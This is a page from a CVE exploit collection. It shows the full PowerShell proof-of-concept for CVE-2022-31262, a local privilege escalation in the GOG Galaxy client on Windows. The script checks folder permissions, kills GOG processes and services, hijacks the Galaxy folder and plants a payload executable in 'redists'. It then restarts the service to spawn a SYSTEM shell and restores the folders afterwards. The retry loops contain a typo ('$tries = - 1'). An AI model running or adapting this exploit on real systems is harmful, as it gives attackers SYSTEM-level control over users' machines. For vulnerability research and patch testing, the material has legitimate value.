4837 Total CVEs
26 Years
GitHub
Home / 2022 / CVE-2022-31262
README.md
Rendering markdown...
POC / exploit.ps1 PS1
⬇ Raw GitHub ✕ Close 
# inputs
param (
    [switch]$exploit
)

$gogFolder = $Env:ProgramData + "\GOG.com\"
$gogGalaxyFolder = $Env:ProgramData + "\GOG.com\Galaxy"
$gogGalaxyFolder_new = $Env:ProgramData + "\GOG.com\Galaxy_orig"
$username = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name

function Invoke-CheckAccess($path) {
    $acl = get-acl $path
    $Access = $acl.Access
    $hasAccess = $false

    foreach ($AccessObject in $Access) {
        $User = $AccessObject.IdentityReference.value
        $Rights = $AccessObject.FileSystemRights
        $Control = $AccessObject.AccessControlType

        if ($Control -eq "Allow" -and $User -eq $username -and $Rights -match "FullControl") { 
            $hasAccess = $true
        }
    }
    if ($hasAccess) {
        return $true
    }
    return $false
}


$gogFolderAccess = Invoke-CheckAccess($gogFolder)
$gogGalaxyFolderAccess = Invoke-CheckAccess($gogGalaxyFolder)

if ($gogFolderAccess -and $gogGalaxyFolderAccess) {
    Write-Output "[+] Permissions check successful! Target is vulnerable!`n"
    

    if (!$exploit) {
        Write-Output "use -exploit to get a system shell`n"
        exit
    }

    # check if GOG is running and try to kill it
    Write-Output "[+] try to close GalaxyClient..."
    $gog = Get-Process GalaxyClient -ErrorAction SilentlyContinue
    if ($gog) {
        # try gracefully first
        $null = $gog.CloseMainWindow()
        # kill after five seconds
        Start-Sleep 5
        if (!$gog.HasExited) {
            $null = $gog | Stop-Process -Force
        }
    }
    Remove-Variable gog

    # check for gog services and shut them down
    Write-Output "[+] try to stop Galaxy services..."
    Stop-Service -Name "GalaxyClientService" -Force
    Stop-Service -Name "GalaxyCommunication" -Force

    # wait 5 seconds
    Start-Sleep 5

    $renOk = $false
    $tries = 5
    Do {
        try {
            Write-Output "[+] try to rename Galaxy folder..."
            $renItem = Rename-Item $gogGalaxyFolder $gogGalaxyFolder_new -Force -PassThru -ErrorAction 'Stop' 

            if ($renItem) {
                $renOk = $true
            }
        }
        catch {
            
            Write-Output "[-] failed... try to kill all GOG processes"

            #check again for any active Gog Process and kill them
            Get-Process "GalaxyClient" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GalaxyClientService" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GalaxyClient Helper" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GOG Galaxy Notifications Renderer" -ErrorAction SilentlyContinue | Stop-Process -Force
            Get-Process "GalaxyCommunication" -ErrorAction SilentlyContinue | Stop-Process -Force         

            if ($tries -eq 1) {
            Write-Output "[-] exploit failed"
            Write-Output $_
            exit
            }  
            $tries = - 1
            Start-Sleep 5  
  
        }

    } While ($renOk -eq $false -or $tries -eq 0)

    if ($renOk -eq $true) {

        try {
            Write-Output "[+] successful, try to hijack folder structure..."
            $null = New-Item -Path $gogFolder -Name "Galaxy" -ItemType "directory" -ErrorAction 'Stop' 
            Start-Sleep 1
            $null = New-Item -Path $gogGalaxyFolder -Name "redists" -ItemType "directory" -ErrorAction 'Stop' 
            Start-Sleep 1
            $redists = $gogGalaxyFolder + "\redists\"
            Write-Output "[+] successful, placing payload..."
            Copy-Item ".\GalaxyCommunication.exe" -Destination $redists -ErrorAction 'Stop' 
            Start-Sleep 1
            Write-Output "[+] successful, spawning system shell..."       
        }
        catch {
           Write-Output "[-] exploit failed"
           Write-Output $_
           exit
        }
        # start GalaxService with payload
        try {
            Start-Service -Name "GalaxyCommunication" -ErrorAction SilentlyContinue
        }
        catch {
            Write-Output ""   
        }
        
        # restore GOG
        Write-Output "`n[+] try to restore folder structure..."
        $restoreOk = $false
        $tries = 5

        Do {
            try {  
                Remove-Item $gogGalaxyFolder -Recurse -ErrorAction 'Stop' 
                Rename-Item $gogGalaxyFolder_new $gogGalaxyFolder -ErrorAction 'Stop' 
                $restoreOk = $true
            }
            catch {
                Start-Sleep 5
                Write-Output "[-] restore failed, try it again"
                $tries = - 1       
            }
        } While ($restoreOk -eq $false -or $tries -eq 0)
        if ($restoreOk) {
            Write-Output "[+] successful, removed exploit and restored everything`n"
        } else {
            Write-Output "[-] restore failed you need to do it manually or reinstall GOG"
        }
    }
    else {
        Write-Output "[-] Exploit failed, cant rename $gogGalaxyFolder, make sure no other application has opened files in this folder (try a system reboot)"   
    }
}
else {
    Write-Output "[-] Permission check faild, target does not seam to be vulnerable!"
}